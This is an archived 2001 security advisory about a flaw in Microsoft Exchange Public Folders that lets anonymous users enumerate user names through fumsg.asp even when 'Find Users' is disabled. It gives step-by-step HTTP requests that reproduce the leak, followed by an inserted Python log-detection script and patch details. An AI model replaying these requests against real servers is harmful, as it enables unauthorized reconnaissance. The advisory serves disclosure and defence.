Exchange Public Folders Information Leakage

From: Aviram Jenik (aviramat_private)
Date: Fri Sep 07 2001 - 02:21:07 PDT


    The following security advisory is sent to the securiteam mailing list, and
    can be found at the SecuriTeam web site: http://www.securiteam.com
    
    SUMMARY
    
    Microsoft Exchange Server handles anonymous access to its Public Folders
    insecurely. While administrators may disable the "Find Users" feature to
    prevent anonymous users from enumerating existing user names, a security
    flaw in Exchange Server allows remote attackers with access to the
    Exchange server to run "Find Users" anyway.
    
    DETAILS
    
    The "Find Users" option of Microsoft Exchange's Public Folders can be
    disabled. Doing so, however, does not prevent users from directly
    accessing the ASP page behind it (fumsg.asp). The link to "Find Users" is
    hidden, but the page itself can still be requested programmatically, so
    the user enumeration it offers remains available to anonymous sessions.
    
    Steps to recreate: 
    1) Contact:
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com
    
    
    2) Access the redirected page, and resend the issued cookie.
    GET /exchange/logonfrm.asp HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    
    
    3) Access the redirected page, and resend the issued cookie.
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    
    
    4) Issue this request to obtain a list of users with the letter 'a' in 
    their name (e.g. Administrator)
    POST /exchange/finduser/fumsg.asp HTTP/1.1
    Host: www.example.com
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
    
    DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
    
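Because a disabled "Find Users" only hides the link, the server-side trace of the page being requested is the signal a defender can act on. The following script is an added example, not part of the advisory: it parses an IIS W3C extended log (the excerpt below is constructed, and the field list is assumed) and reports requests to fumsg.asp that carry no authenticated user, which is what the anonymous session in the steps above looks like in the log.

```python
# Constructed IIS W3C extended log excerpt (not from the advisory): an
# anonymous OWA session walking the steps above, then a normal authenticated
# user legitimately using Find Users.  cs-username is '-' when anonymous.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2001-09-07 10:12:01 203.0.113.5 - GET /exchange/root.asp acs=anon 302
2001-09-07 10:12:02 203.0.113.5 - GET /exchange/logonfrm.asp - 302
2001-09-07 10:12:03 203.0.113.5 - POST /exchange/finduser/fumsg.asp - 200
2001-09-07 10:15:44 198.51.100.9 jsmith GET /exchange/inbox/ - 200
2001-09-07 10:16:10 198.51.100.9 jsmith POST /exchange/finduser/fumsg.asp - 200
"""

# Path of the Find Users page named in the advisory (compared case-insensitively,
# since IIS paths are not case-sensitive).
FIND_USERS_PAGE = "/exchange/finduser/fumsg.asp"


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # directive names the columns
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_finduser_hits(text, anonymous_only=True):
    """Return (client ip, date, time) for each request to the Find Users page.

    With anonymous_only=True only requests without an authenticated user are
    reported.  If "Find Users" has been disabled in OWA, every hit on the page
    is unexpected, so pass anonymous_only=False to report all of them.
    """
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != FIND_USERS_PAGE:
            continue
        if anonymous_only and rec.get("cs-username", "-") != "-":
            continue
        hits.append((rec["c-ip"], rec["date"], rec["time"]))
    return hits


if __name__ == "__main__":
    for ip, day, clock in find_finduser_hits(SAMPLE_IIS_LOG):
        print(f"anonymous Find Users request from {ip} at {day} {clock}")
```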
    Vendor status:
    Microsoft has been contacted on August 4, 2001. A security bulletin was 
    released on September 7, 2001.
    
    Solution:
    Microsoft has released a patch for this problem. See Microsoft Security
    Bulletin MS01-047 for more information:
    <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>
    
    
    ADDITIONAL INFORMATION
    This security hole was discovered by <mailto:noamrat_private> Noam Rathaus.
    The information has been provided by <mailto:expertsat_private>
    SecuriTeam Experts.
    
    
    
    ====================
    ====================
    
    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of
    any kind. In no event shall we be liable for any damages whatsoever
    including direct, indirect, incidental, consequential, loss of business
    profits or special damages.
    



    This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:53:07 PDT